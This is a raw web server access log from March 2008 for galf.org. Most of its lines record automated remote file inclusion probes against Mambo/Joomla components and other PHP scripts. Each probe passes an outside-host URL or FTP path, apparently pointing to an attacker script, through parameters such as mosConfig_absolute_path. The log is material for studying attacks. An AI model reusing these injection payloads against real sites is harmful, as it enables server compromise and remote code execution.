74.52.2.130 - - [23/Mar/2008:18:07:07 -0700] "GET /logs/access_080225.log/index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:18:07:45 -0700] "GET /logs/access.log/main.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.25.137.24 - - [23/Mar/2008:18:07:45 -0700] "GET /main.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.25.137.24 - - [23/Mar/2008:18:07:46 -0700] "GET /logs/main.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
66.7.207.104 - - [23/Mar/2008:18:07:50 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:18:07:50 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.102.0.104 - - [23/Mar/2008:18:08:09 -0700] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
212.102.0.104 - - [23/Mar/2008:18:08:09 -0700] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:18:09:22 -0700] "GET /index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:18:09:51 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:18:09:52 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:18:10:14 -0700] "GET /logs/access_071203.log/index.php3?pag=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:18:10:14 -0700] "GET /index.php3?pag=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:18:10:15 -0700] "GET /logs/index.php3?pag=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:18:10:15 -0700] "GET /logs/access_071217.log/index.php3?pag=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.119.152.13 - - [23/Mar/2008:18:11:13 -0700] "GET /logs/index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:11:24 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:11:24 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:11:24 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:11:24 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:11:24 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:11:24 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.10.47.53 - - [23/Mar/2008:18:11:25 -0700] "GET /logs/index.php3?pag=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.10.47.53 - - [23/Mar/2008:18:11:26 -0700] "GET /index.php3?pag=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.169.183 - - [23/Mar/2008:18:11:27 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
208.186.169.183 - - [23/Mar/2008:18:11:27 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
213.247.44.96 - - [23/Mar/2008:18:11:52 -0700] "GET /logs/index.php3?pag=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.247.44.96 - - [23/Mar/2008:18:11:52 -0700] "GET /index.php3?pag=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:11:56 -0700] "GET /logs/access_080113.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:11:58 -0700] "GET /logs/access_080113.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.119.152.13 - - [23/Mar/2008:18:12:18 -0700] "GET /logs/access_080225.log/index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:18:12:19 -0700] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.212.173.42 - - [23/Mar/2008:18:13:51 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.212.173.42 - - [23/Mar/2008:18:13:51 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.247.44.96 - - [23/Mar/2008:18:13:57 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:14:25 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:14:25 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.52.195.135 - - [23/Mar/2008:18:15:18 -0700] "GET /index2.php?option=com_content&do_pdf=&id=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
72.52.195.135 - - [23/Mar/2008:18:15:18 -0700] "GET /logs/index2.php?option=com_content&do_pdf=&id=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
72.36.235.74 - - [23/Mar/2008:18:15:29 -0700] "GET /logs/access_071112.log/index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.253.99.164 - - [23/Mar/2008:18:15:36 -0700] "GET /logs/access_080225.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:15:42 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:15:42 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.118.102.153 - - [23/Mar/2008:18:15:59 -0700] "GET /index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
213.247.44.96 - - [23/Mar/2008:18:17:01 -0700] "GET /index.php3?pag=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
89.111.176.114 - - [23/Mar/2008:18:17:09 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.114 - - [23/Mar/2008:18:17:10 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.95.82.113 - - [23/Mar/2008:18:17:21 -0700] "GET /index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
74.95.82.113 - - [23/Mar/2008:18:17:21 -0700] "GET /logs/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
67.212.173.42 - - [23/Mar/2008:18:17:36 -0700] "GET /logs/access_070924.log//newspublish/include.php?path%5Bdocroot%5D=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
128.241.54.180 - - [23/Mar/2008:18:18:44 -0700] "GET /logs/access_071217.log//admin/includes/admin_header.php?level=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:18:19:11 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:18:19:11 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
194.187.213.53 - - [23/Mar/2008:18:19:40 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
72.36.208.178 - - [23/Mar/2008:18:20:20 -0700] "GET /logs/access_071022.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.208.178 - - [23/Mar/2008:18:20:20 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.208.178 - - [23/Mar/2008:18:20:20 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.208.178 - - [23/Mar/2008:18:20:26 -0700] "GET /logs/access_080107.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:20:58 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.windsornw.com/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
116.12.48.135 - - [23/Mar/2008:18:21:12 -0700] "GET /logs//use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
116.12.48.135 - - [23/Mar/2008:18:21:12 -0700] "GET //use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
116.12.48.135 - - [23/Mar/2008:18:21:12 -0700] "GET //use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
116.12.48.135 - - [23/Mar/2008:18:21:12 -0700] "GET /logs//use/index.html?ref=dizinler.com/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bashdrfunk.fileave.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:21:15 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:21:15 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:18:22:26 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:18:22:26 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.22.204.188 - - [23/Mar/2008:18:22:49 -0700] "GET /logs/access_070917.log//login.php?dir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.22.204.188 - - [23/Mar/2008:18:22:50 -0700] "GET //login.php?dir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.22.204.188 - - [23/Mar/2008:18:22:50 -0700] "GET /logs//login.php?dir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.22.204.188 - - [23/Mar/2008:18:22:53 -0700] "GET /logs/access_071014.log//login.php?dir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:18:23:14 -0700] "GET /logs/access_070820.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.208.178 - - [23/Mar/2008:18:23:26 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:23:38 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.windsornw.com/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.22.204.188 - - [23/Mar/2008:18:24:42 -0700] "GET //login.php?dir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.150.128.201 - - [23/Mar/2008:18:26:14 -0700] "GET /logs/access_071022.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
209.150.128.201 - - [23/Mar/2008:18:26:14 -0700] "GET /logs/access_071022.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
209.150.128.201 - - [23/Mar/2008:18:26:14 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
209.150.128.201 - - [23/Mar/2008:18:26:14 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
209.150.128.201 - - [23/Mar/2008:18:26:14 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
209.150.128.201 - - [23/Mar/2008:18:26:21 -0700] "GET /logs/access_080107.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
209.150.128.201 - - [23/Mar/2008:18:26:21 -0700] "GET /logs/access_080107.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://eurolinkmedia.com:3636//id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
69.61.37.111 - - [23/Mar/2008:18:26:23 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:18:27:16 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:18:27:31 -0700] "GET /logs/access_080113.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
58.65.239.170 - - [23/Mar/2008:18:28:36 -0700] "GET /logs/access_070924.log HTTP/1.1" 200 1245184 "-" "-" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:18:28:54 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
190.54.28.163 - - [23/Mar/2008:18:30:39 -0700] "GET /logs/index.php3?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:30:49 -0700] "GET /logs/access_071022.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.windsornw.com/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:30:49 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.windsornw.com/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:18:31:09 -0700] "GET /logs/access_071022.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.89.224.76 - - [23/Mar/2008:18:31:20 -0700] "GET /logs/access_080317.log HTTP/1.0" 200 9589685 "-" "Wget/1.10.2" "galf.org"
87.117.225.155 - - [23/Mar/2008:18:33:16 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:18:33:16 -0700] "GET /logs/access_071112.log/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:18:33:17 -0700] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.12.29.5 - - [23/Mar/2008:18:33:33 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:33:49 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.176 - - [23/Mar/2008:18:34:14 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.92.85.176 - - [23/Mar/2008:18:34:15 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:34:16 -0700] "GET /logs/access_080113.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.214.235 - - [23/Mar/2008:18:36:40 -0700] "GET /logs/access_070917.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:18:39:48 -0700] "GET /main.php?d1=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:18:39:48 -0700] "GET /logs/main.php?d1=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:18:39:59 -0700] "GET /index.php?meio=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:18:40:00 -0700] "GET /logs/index.php?meio=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:18:40:56 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:18:40:56 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:18:41:18 -0700] "GET /logs/access_071022.log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:18:41:18 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:18:41:19 -0700] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 6801 "-" "libwww-perl/5.808" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:18:41:56 -0700] "GET /logs/access_071008.log/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:42:34 -0700] "GET /logs/access_071022.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.117.225.155 - - [23/Mar/2008:18:42:34 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.195.44.110 - - [23/Mar/2008:18:43:20 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.44.113 - - [23/Mar/2008:18:43:21 -0700] "GET /logs/access_080114.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:18:44:17 -0700] "GET /logs/access_071203.log/auto.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
